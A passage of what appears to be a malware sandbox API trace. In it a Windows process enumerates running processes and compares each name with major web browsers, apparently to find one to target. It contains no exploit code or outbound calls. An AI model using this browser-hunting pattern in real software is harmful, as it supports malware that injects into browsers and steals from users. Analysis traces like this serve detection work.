lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0195.267] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0195.267] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0195.267] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.267] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0195.267] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0195.267] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0195.267] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0195.267] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0195.267] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.268] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0195.268] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0195.268] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0195.268] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0195.268] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0195.268] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.268] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0195.269] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0195.269] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0195.269] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0195.269] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0195.269] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.269] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.269] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.269] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.269] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.269] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0195.269] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.269] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.270] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.270] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.270] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.270] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0195.270] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.270] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.270] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.270] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.270] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.270] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0195.270] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.270] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.271] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.271] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.271] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.271] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0195.271] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.271] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.272] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.272] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.272] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.272] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0195.272] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.272] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0195.272] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0195.272] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0195.272] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0195.272] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0195.272] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.272] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.273] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.273] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.273] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.273] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0195.273] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.273] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.273] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.273] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.273] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.274] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0195.274] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.274] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0195.274] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0195.274] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0195.274] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0195.274] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0195.274] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.274] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0195.275] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0195.275] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0195.275] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0195.275] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0195.275] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.275] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0195.275] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0195.275] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0195.275] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0195.275] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0195.275] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.275] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.276] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.276] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.276] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.276] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0195.276] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.276] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0195.276] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0195.276] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0195.277] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0195.277] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0195.277] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.277] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0195.277] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0195.277] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0195.277] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0195.277] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0195.277] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.277] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0195.278] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0195.278] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0195.278] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0195.278] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0195.278] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.278] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0195.278] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0195.278] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0195.278] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0195.278] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0195.278] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.278] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0195.279] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0195.279] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0195.279] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0195.279] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0195.279] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.279] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0195.280] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0195.280] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0195.280] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0195.280] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0195.280] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.280] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0195.280] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0195.280] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0195.280] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0195.280] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0195.280] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.280] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0195.281] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0195.281] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0195.281] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0195.281] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0195.281] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.281] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0195.281] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0195.281] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0195.281] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0195.281] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0195.281] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.281] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0195.282] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0195.282] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0195.282] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0195.282] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0195.282] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.282] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0195.283] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0195.283] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0195.283] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0195.283] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0195.283] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.283] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0195.283] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0195.283] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0195.283] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0195.283] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0195.283] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.283] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0195.284] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0195.284] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0195.284] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0195.284] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0195.284] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.284] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0195.284] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0195.284] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0195.284] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0195.284] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0195.284] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.284] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0195.285] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0195.285] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0195.285] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0195.285] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0195.285] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.285] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0195.286] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0195.286] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0195.286] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0195.286] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0195.286] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.286] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0195.286] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0195.286] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0195.286] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0195.286] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0195.286] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.286] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0195.287] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0195.287] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0195.287] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0195.287] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0195.287] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.287] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0195.287] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0195.287] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0195.287] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0195.287] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0195.287] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.287] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0195.288] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0195.288] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0195.288] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0195.288] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0195.288] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.288] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0195.289] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0195.289] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0195.289] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0195.289] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0195.289] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.289] Process32Next (in: hSnapshot=0xe8, 